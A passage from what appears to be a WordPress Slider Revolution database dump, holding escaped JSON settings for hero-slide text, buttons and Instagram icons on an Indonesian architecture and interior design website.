}},\"fontWeight\":{\"d\":{\"v\":\"500\",\"e\":true},\"n\":{\"v\":\"500\"},\"t\":{\"v\":\"500\"},\"m\":{\"v\":\"500\"}},\"letterSpacing\":{\"d\":{\"v\":\"3px\",\"e\":true},\"n\":{\"v\":\"2px\"},\"t\":{\"v\":\"1px\"},\"m\":{\"v\":\"0px\"}},\"lineHeight\":{\"d\":{\"v\":\"12px\",\"e\":true},\"n\":{\"v\":\"10px\"},\"t\":{\"v\":\"7px\"},\"m\":{\"v\":\"6px\"}},\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0],\"rotationX\":\"0deg\",\"rotationY\":\"0deg\",\"rotationZ\":\"0deg\",\"textTransform\":\"uppercase\",\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[],\"inactive_actions\":[]},\"visibility\":{\"m\":false,\"n\":false,\"t\":false,\"hideunder\":true},\"type\":\"text\"},\"9\":{\"text\":\"<i class=\\\"fa-instagram\\\"><\\/i>\",\"alias\":\"Instagram\",\"uid\":9,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"37px\"},\"n\":{\"v\":\"31px\"},\"t\":{\"v\":\"23px\"},\"m\":{\"v\":\"14px\"}},\"height\":{\"d\":{\"v\":\"37px\"},\"n\":{\"v\":\"31px\"},\"t\":{\"v\":\"23px\"},\"m\":{\"v\":\"14px\"}},\"minWidth\":{\"d\":{\"v\":\"37px\",\"e\":true}},\"minHeight\":{\"d\":{\"v\":\"37px\",\"e\":true}},\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"110px\",\"e\":true},\"n\":{\"v\":\"93px\"},\"t\":{\"v\":\"70px\"},\"m\":{\"v\":\"43px\"}},\"horizontal\":{\"d\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true}},\"zIndex\":14},\"behavior\":{\"baseAlign\":\"slide\"},\"group\":{\"puid\":\"10\",\"groupOrder\":14},\"timeline\":{\"frames\":{\"frame_0\":{\"timeline\":{\"endWithSlide\":false}},\"frame_1\":{\"transform\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"timeline\":{\"endWithSlide\":false,\"frameLength\":300}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":7000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":7000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontSize\":{\"n\":{\"v\":\"17\"},\"t\":{\"v\":\"12\"},\"m\":{\"v\":\"7\"}},\"lineHeight\":{\"d\":{\"v\":\"37\"},\"n\":{\"v\":\"31\"},\"t\":{\"v\":\"23\"},\"m\":{\"v\":\"14\"}},\"textAlign\":{\"d\":{\"v\":\"center\"},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"backgroundColor\":\"rgba(255, 255, 255, 0)\",\"borderRadius\":{\"v\":[\"50%\",\"50%\",\"50%\",\"50%\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"textTransform\":\"uppercase\",\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"usehover\":\"true\",\"color\":\"#e3b25a\",\"backgroundColor\":\"rgba(255, 255, 255, 0)\",\"borderRadius\":{\"v\":[\"50%\",\"50%\",\"50%\",\"50%\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"copied\":true},\"actions\":{\"action\":[{\"action\":\"link\",\"tooltip_event\":\"click\",\"link_help_in\":\"keep\",\"link_open_in\":\"_blank\",\"link_follow\":\"follow\",\"link_type\":\"a\",\"image_link\":\"https:\\/\\/www.instagram.com\\/bauhausliving\\/\"}],\"inactive_actions\":[]},\"type\":\"button\"},\"10\":{\"text\":\"\",\"alias\":\"Social-icon\",\"uid\":10,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"120px\",\"e\":true},\"n\":{\"v\":\"102px\"},\"t\":{\"v\":\"77px\"},\"m\":{\"v\":\"47px\"}},\"height\":{\"d\":{\"v\":\"300px\",\"e\":true},\"n\":{\"v\":\"256px\"},\"t\":{\"v\":\"194px\"},\"m\":{\"v\":\"119px\"}},\"originalWidth\":\"300px\",\"originalHeight\":\"180px\",\"aspectRatio\":{\"d\":{\"v\":1.6666666666666667},\"n\":{\"v\":1.6666666666666667},\"t\":{\"v\":1.6666666666666667},\"m\":{\"v\":1.6666666666666667}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"28px\",\"e\":true},\"n\":{\"v\":\"23px\"},\"t\":{\"v\":\"17px\"},\"m\":{\"v\":\"10px\"}},\"y\":{\"d\":{\"v\":\"289px\",\"e\":true},\"n\":{\"v\":\"246px\"},\"t\":{\"v\":\"186px\"},\"m\":{\"v\":\"114px\"}},\"zIndex\":16},\"behavior\":{\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":16},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"-50\"},\"n\":{\"v\":\"-42\"},\"t\":{\"v\":\"-31\"},\"m\":{\"v\":\"-19\"}}},\"timeline\":{\"endWithSlide\":false,\"alias\":\"Anim From\"}},\"frame_1\":{\"timeline\":{\"speed\":1000,\"start\":2500,\"endWithSlide\":false,\"alias\":\"Anim To\",\"frameLength\":1000}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":7000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":2500},{\"id\":\"frame_999\",\"start\":7000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontSize\":{\"n\":{\"v\":\"17\"},\"t\":{\"v\":\"12\"},\"m\":{\"v\":\"7\"}},\"lineHeight\":{\"n\":{\"v\":\"21\"},\"t\":{\"v\":\"15\"},\"m\":{\"v\":\"9\"}},\"backgroundColor\":\"rgba(255, 255, 255, 0)\",\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0],\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[],\"inactive_actions\":[]},\"visibility\":{\"m\":false,\"n\":false,\"t\":false,\"hideunder\":true},\"type\":\"group\"},\"12\":{\"text\":\"\",\"alias\":\"Line\",\"uid\":12,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"1px\",\"e\":true},\"n\":{\"v\":\"1px\"},\"t\":{\"v\":\"1px\"},\"m\":{\"v\":\"1px\"}},\"height\":{\"d\":{\"v\":\"90px\",\"e\":true},\"n\":{\"v\":\"76px\"},\"t\":{\"v\":\"57px\"},\"m\":{\"v\":\"35px\"}},\"originalWidth\":\"300px\",\"originalHeight\":\"180px\",\"aspectRatio\":{\"d\":{\"v\":1.6666666666666667},\"n\":{\"v\":1.6666666666666667},\"t\":{\"v\":1.6666666666666667},\"m\":{\"v\":1.6666666666666667}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"17px\",\"e\":true},\"n\":{\"v\":\"14px\"},\"t\":{\"v\":\"10px\"},\"m\":{\"v\":\"6px\"}},\"y\":{\"d\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":11},\"group\":{\"puid\":\"10\",\"groupOrder\":11},\"timeline\":{\"frames\":{\"frame_0\":{\"timeline\":{\"endWithSlide\":false}},\"frame_1\":{\"timeline\":{\"endWithSlide\":false,\"frameLength\":300}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":7000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":7000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontSize\":{\"n\":{\"v\":\"17\"},\"t\":{\"v\":\"12\"},\"m\":{\"v\":\"7\"}},\"lineHeight\":{\"n\":{\"v\":\"21\"},\"t\":{\"v\":\"15\"},\"m\":{\"v\":\"9\"}},\"backgroundColor\":\"#ffffff\",\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0],\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[],\"inactive_actions\":[]},\"type\":\"shape\"},\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":7},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":7},\"text\":\"\"},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":6},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":6},\"text\":\"\"},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":5},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":5},\"text\":\"\"}}','{\"version\":\"6.5.25\"}'),(3,1,3,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"type\":\"image\",\"image\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bg-revslider-home1-03.jpg\",\"imageId\":1710,\"imageLib\":\"medialibrary\",\"imageWidth\":1920,\"imageHeight\":820,\"imageRatio\":2.341463414634146},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"attributes\":{\"alt\":\"Architecture & Interior\"},\"slideChange\":{\"speed\":\"900ms\",\"f\":\"random\",\"d\":\"20\",\"in\":{\"o\":0,\"r\":\"{-45,45}\",\"sx\":0,\"sy\":0,\"row\":5,\"col\":5},\"out\":{\"a\":false},\"title\":\"*rotate_left* Scale & Fade\",\"main\":\"boxes\",\"group\":\"rotation\",\"preset\":\"boxrandomrotate\"}}','{\"0\":{\"text\":\"Tim Ahli\\n<span class=\\\"ova-stroke-text\\\" >dan Berpengalaman<\\/span> \",\"alias\":\"Title\",\"uid\":0,\"htmltag\":\"h1\",\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"m\":{\"v\":\"90%\",\"e\":true}},\"height\":{\"d\":{\"e\":true}},\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"v\":\"30px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"21px\",\"e\":true},\"n\":{\"v\":\"20px\",\"e\":true},\"t\":{\"v\":\"50px\",\"e\":true},\"m\":{\"v\":\"50px\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\"}},\"zIndex\":9},\"group\":{\"groupOrder\":9},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"175%\"},\"n\":{\"v\":\"175%\"},\"t\":{\"v\":\"175%\"},\"m\":{\"v\":\"175%\"}},\"opacity\":1},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"-100%\"},\"n\":{\"v\":\"-100%\"},\"t\":{\"v\":\"-100%\"},\"m\":{\"v\":\"-100%\"}}},\"timeline\":{\"endWithSlide\":false,\"alias\":\"Anim From\"}},\"frame_1\":{\"mask\":{\"use\":true},\"timeline\":{\"ease\":\"power3.out\",\"speed\":\"1200\",\"start\":1000,\"endWithSlide\":false,\"alias\":\"Anim To\",\"frameLength\":1200}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":7000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":1000},{\"id\":\"frame_999\",\"start\":7000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontFamily\":\"Manrope\",\"fontSize\":{\"d\":{\"v\":\"80px\",\"e\":true},\"n\":{\"v\":\"80px\",\"e\":true},\"t\":{\"v\":\"70px\",\"e\":true},\"m\":{\"v\":\"48px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\"},\"t\":{\"v\":\"700\"},\"m\":{\"v\":\"700\"}},\"letterSpacing\":{\"d\":{\"v\":\"0px\",\"e\":true},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"lineHeight\":{\"d\":{\"v\":\"92px\",\"e\":true},\"n\":{\"v\":\"92px\",\"e\":true},\"t\":{\"v\":\"82px\",\"e\":true},\"m\":{\"v\":\"60px\",\"e\":true}},\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0],\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[],\"inactive_actions\":[]},\"type\":\"text\"},\"1\":{\"text\":\"Cek Tim kami\",\"alias\":\"Button\",\"uid\":1,\"toggle\":{\"text\":\"\"},\"size\":{\"minWidth\":{\"d\":{\"e\":true}},\"minHeight\":{\"d\":{\"v\":\"0px\",\"e\":true}},\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"37px\",\"e\":true},\"n\":{\"v\":\"31px\"},\"t\":{\"v\":\"35px\",\"e\":true},\"m\":{\"v\":\"36px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"210px\",\"e\":true},\"n\":{\"v\":\"200px\",\"e\":true},\"t\":{\"v\":\"100px\",\"e\":true},\"m\":{\"v\":\"90px\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":10},\"group\":{\"groupOrder\":10},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"rotationY\":\"360deg\"},\"timeline\":{\"endWithSlide\":false,\"alias\":\"Anim From\"}},\"frame_1\":{\"timeline\":{\"ease\":\"back.out\",\"speed\":\"2000\",\"start\":1500,\"endWithSlide\":false,\"alias\":\"Anim To\",\"frameLength\":2000}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":7000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":1500},{\"id\":\"frame_999\",\"start\":7000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"v\":\"#000000\"},\"n\":{\"v\":\"#000000\"},\"t\":{\"v\":\"#000000\"},\"m\":{\"v\":\"#000000\"}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[18,40,18,40],\"e\":true},\"n\":{\"v\":[18,40,18,40],\"e\":true},\"t\":{\"v\":[18,40,18,40],\"e\":true},\"m\":{\"v\":[18,40,18,40],\"e\":true}},\"fontFamily\":\"Manrope\",\"fontSize\":{\"d\":{\"v\":\"12px\",\"e\":true},\"n\":{\"v\":\"12px\",\"e\":true},\"t\":{\"v\":\"12px\",\"e\":true},\"m\":{\"v\":\"12px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\"},\"t\":{\"v\":\"700\"},\"m\":{\"v\":\"700\"}},\"letterSpacing\":{\"d\":{\"v\":\"1px\",\"e\":true},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"lineHeight\":{\"d\":{\"v\":\"12px\",\"e\":true},\"n\":{\"v\":\"12px\",\"e\":true},\"t\":{\"v\":\"12px\",\"e\":true},\"m\":{\"v\":\"12px\",\"e\":true}},\"backgroundColor\":\"rgba(255,255,255,1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"textTransform\":\"uppercase\",\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"usehover\":\"false\",\"backgroundColor\":\"#e3b25a\",\"gradientStyle\":\"sliding\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"speed\":\"500ms\",\"ease\":\"default\",\"copied\":true},\"actions\":{\"action\":[{\"action\":\"link\",\"tooltip_event\":\"click\",\"link_help_in\":\"keep\",\"link_open_in\":\"_self\",\"link_follow\":\"follow\",\"link_type\":\"a\",\"image_link\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/office\\/\"}],\"inactive_actions\":[]},\"runtime\":{\"internalClass\":\"rev-btn\"},\"type\":\"button\"},\"2\":{\"text\":\"<span class=ova-share-text>Share<\\/span>\",\"alias\":\"Share\",\"uid\":2,\"toggle\":{\"text\":\"\"},\"size\":{\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"40px\",\"e\":true},\"n\":{\"v\":\"34px\"},\"t\":{\"v\":\"25px\"},\"m\":{\"v\":\"15px\"}},\"y\":{\"d\":{\"v\":\"159px\",\"e\":true},\"n\":{\"v\":\"135px\"},\"t\":{\"v\":\"102px\"},\"m\":{\"v\":\"62px\"}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":11},\"behavior\":{\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":11},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"-50\"},\"n\":{\"v\":\"-42\"},\"t\":{\"v\":\"-31\"},\"m\":{\"v\":\"-19\"}}},\"timeline\":{\"endWithSlide\":false,\"alias\":\"Anim From\"}},\"frame_1\":{\"timeline\":{\"speed\":1000,\"start\":2500,\"endWithSlide\":false,\"alias\":\"Anim To\",\"frameLength\":1000}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":7000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":2500},{\"id\":\"frame_999\",\"start\":7000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontFamily\":\"Manrope\",\"fontSize\":{\"d\":{\"v\":\"12px\",\"e\":true},\"n\":{\"v\":\"10px\"},\"t\":{\"v\":\"7px\"},\"m\":{\"v\":\"4px\"}},\"fontWeight\":{\"d\":{\"v\":\"500\",\"e\":true},\"n\":{\"v\":\"500\"},\"t\":{\"v\":\"500\"},\"m\":{\"v\":\"500\"}},\"letterSpacing\":{\"d\":{\"v\":\"3px\",\"e\":true},\"n\":{\"v\":\"2px\"},\"t\":{\"v\":\"1px\"},\"m\":{\"v\":\"0px\"}},\"lineHeight\":{\"d\":{\"v\":\"12px\",\"e\":true},\"n\":{\"v\":\"10px\"},\"t\":{\"v\":\"7px\"},\"m\":{\"v\":\"6px\"}},\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0],\"rotationX\":\"0deg\",\"rotationY\":\"0deg\",\"rotationZ\":\"0deg\",\"textTransform\":\"uppercase\",\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[],\"inactive_actions\":[]},\"visibility\":{\"m\":false,\"n\":false,\"t\":false,\"hideunder\":true},\"type\":\"text\"},\"9\":{\"text\":\"<i class=\\\"fa-instagram\\\"><\\/i>\",\"alias\":\"Instagram\",\"uid\":9,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"37px\"},\"n\":{\"v\":\"31px\"},\"t\":{\"v\":\"23px\"},\"m\":{\"v\":\"14px\"}},\"height\":{\"d\":{\"v\":\"37px\"},\"n\":{\"v\":\"31px\"},\"t\":{\"v\":\"23px\"},\"m\":{\"v\":\"14px\"}},\"minWidth\":{\"d\":{\"v\":\"37px\",\"e\":true}},\"minHeight\":{\"d\":{\"v\":\"37px\",\"e\":true}},\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"110px\",\"e\":true},\"n\":{\"v\":\"93px\"},\"t\":{\"v\":\"70px\"},\"m\":{\"v\":\"43px\"}},\"horizontal\":{\"d\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true}},\"zIndex\":14},\"behavior\":{\"baseAlign\":\"slide\"},\"group\":{\"puid\":\"10\",\"groupOrder\":14},\"timeline\":{\"frames\":{\"frame_0\":{\"timeline\":{\"endWithSlide\":false}},\"frame_1\":{\"transform\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"timeline\":{\"endWithSlide\":false,\"frameLength\":300}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":7000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":7000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontSize\":{\"n\":{\"v\":\"17\"},\"t\":{\"v\":\"12\"},\"m\":{\"v\":\"7\"}},\"lineHeight\":{\"d\":{\"v\":\"37\"},\"n\":{\"v\":\"31\"},\"t\":{\"v\":\"23\"},\"m\":{\"v\":\"14\"}},\"textAlign\":{\"d\":{\"v\":\"center\"},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"backgroundColor\":\"rgba(255, 255, 255, 0)\",\"borderRadius\":{\"v\":[\"50%\",\"50%\",\"50%\",\"50%\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"textTransform\":\"uppercase\",\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"usehover\":\"true\",\"color\":\"#e3b25a\",\"backgroundColor\":\"rgba(255, 255, 255, 0)\",\"borderRadius\":{\"v\":[\"50%\",\"50%\",\"50%\",\"50%\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"copied\":true},\"actions\":{\"action\":[{\"action\":\"link\",\"tooltip_event\":\"click\",\"link_help_in\":\"keep\",\"link_open_in\":\"_blank\",\"link_follow\":\"follow\",\"link_type\":\"a\",\"image_link\":\"https:\\/\\/www.instagram.com\\/bauhausliving\\/\"}],\"inactive_actions\":[]},\"type\":\"button\"},\"10\":{\"text\":\"\",\"alias\":\"Social-icon\",\"uid\":10,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"120px\",\"e\":true},\"n\":{\"v\":\"102px\"},\"t\":{\"v\":\"77px\"},\"m\":{\"v\":\"47px\"}},\"height\":{\"d\":{\"v\":\"300px\",\"e\":true},\"n\":{\"v\":\"256px\"},\"t\":{\"v\":\"194px\"},\"m\":{\"v\":\"119px\"}},\"originalWidth\":\"300px\",\"originalHeight\":\"180px\",\"aspectRatio\":{\"d\":{\"v\":1.6666666666666667},\"n\":{\"v\":1.6666666666666667},\"t\":{\"v\":1.6666666666666667},\"m\":{\"v\":1.6666666666666667}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"28px\",\"e\":true},\"n\":{\"v\":\"23px\"},\"t\":{\"v\":\"17px\"},\"m\":{\"v\":\"10px\"}},\"y\":{\"d\":{\"v\":\"289px\",